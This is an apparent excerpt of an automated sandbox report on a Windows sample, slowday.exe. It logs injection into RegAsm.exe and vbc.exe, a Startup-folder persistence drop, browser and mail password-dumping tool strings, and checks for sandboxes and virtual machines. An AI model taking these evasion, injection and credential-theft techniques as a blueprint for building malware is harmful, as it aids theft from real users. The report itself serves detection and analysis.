            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
            Source: slowday.exeStatic file information: File size 2010624 > 1048576
            Source: slowday.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x122600
            Source: slowday.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: slowday.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: slowday.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: slowday.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: slowday.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: slowday.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: slowday.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: vbc.exe, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507015977.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507223314.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507883137.0000000002D53000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507560729.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: RegAsm.exe, 00000001.00000003.244008454.00000000047C3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000001.00000002.510395381.0000000006981000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.508932595.0000000003234000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000008.00000002.509181368.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000001E.00000000.426727221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000001E.00000000.426172812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000001E.00000002.427693844.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000023.00000002.478736094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000023.00000000.476336904.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000023.00000000.476081488.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: slowday.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: slowday.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: slowday.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: slowday.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: slowday.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DE8AC5 push ecx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00DD497D push ecx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00DD9127 push ebp; retf
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAC5D0 push ebp; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FABE4C push 8BFFFFFFh; retf
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00444975 push ecx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00444B90 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00444B90 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00448E74 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0042CF44 push ebx; retf 0042h
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00444975 push ecx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00444B90 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00444B90 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00448E74 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0042CF44 push ebx; retf 0042h
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DC4D94 LoadLibraryA,GetProcAddress,
            Source: winlogons.exe.0.drStatic PE information: real checksum: 0xe3e32 should be: 0x1ec7db
            Source: slowday.exeStatic PE information: real checksum: 0xe3e32 should be: 0x1f33e6
            Source: C:\Users\user\Desktop\slowday.exeFile created: C:\Users\user\AppData\Roaming\winlogons\winlogons.exeJump to dropped file
            Source: C:\Users\user\Desktop\slowday.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.urlJump to behavior
            Source: C:\Users\user\Desktop\slowday.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.urlJump to behavior
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00443A61 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
            Source: C:\Users\user\Desktop\slowday.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\slowday.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\winlogons\winlogons.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\winlogons\winlogons.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: RegAsm.exe, 00000001.00000002.506893790.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.506835059.0000000002B03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: RegAsm.exe, 00000001.00000002.506893790.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.506835059.0000000002B03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT MacAddress FROM Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT MacAddress FROM Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6932Thread sleep count: 192 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6932Thread sleep time: -192000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5836Thread sleep time: -1200000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 4400Thread sleep count: 156 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 4400Thread sleep time: -156000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6624Thread sleep time: -1200000s >= -30000s
            Source: C:\Users\user\Desktop\slowday.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,
            Source: C:\Users\user\Desktop\slowday.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 600000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 600000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 600000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\slowday.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\WCN\en-US\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\
            Source: winlogons.exe, 00000007.00000003.273619408.0000000000AEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd.exe
            Source: bhvBB7.tmp.21.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20220308T163148Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=1d7250d04496405b83823a4351e0ec8f&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1418351&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1418351&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
            Source: RegAsm.exe, 00000001.00000002.506628397.0000000001031000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: RegAsm.exe, 00000001.00000002.506628397.0000000001031000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0041829C memset,GetSystemInfo,
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00E2449B GetFileAttributesW,FindFirstFileW,FindClose,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00408CAC FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408CAC FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DC4D94 LoadLibraryA,GetProcAddress,
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DF5A39 IsDebuggerPresent,
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DF5BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DF9922 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DEA2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
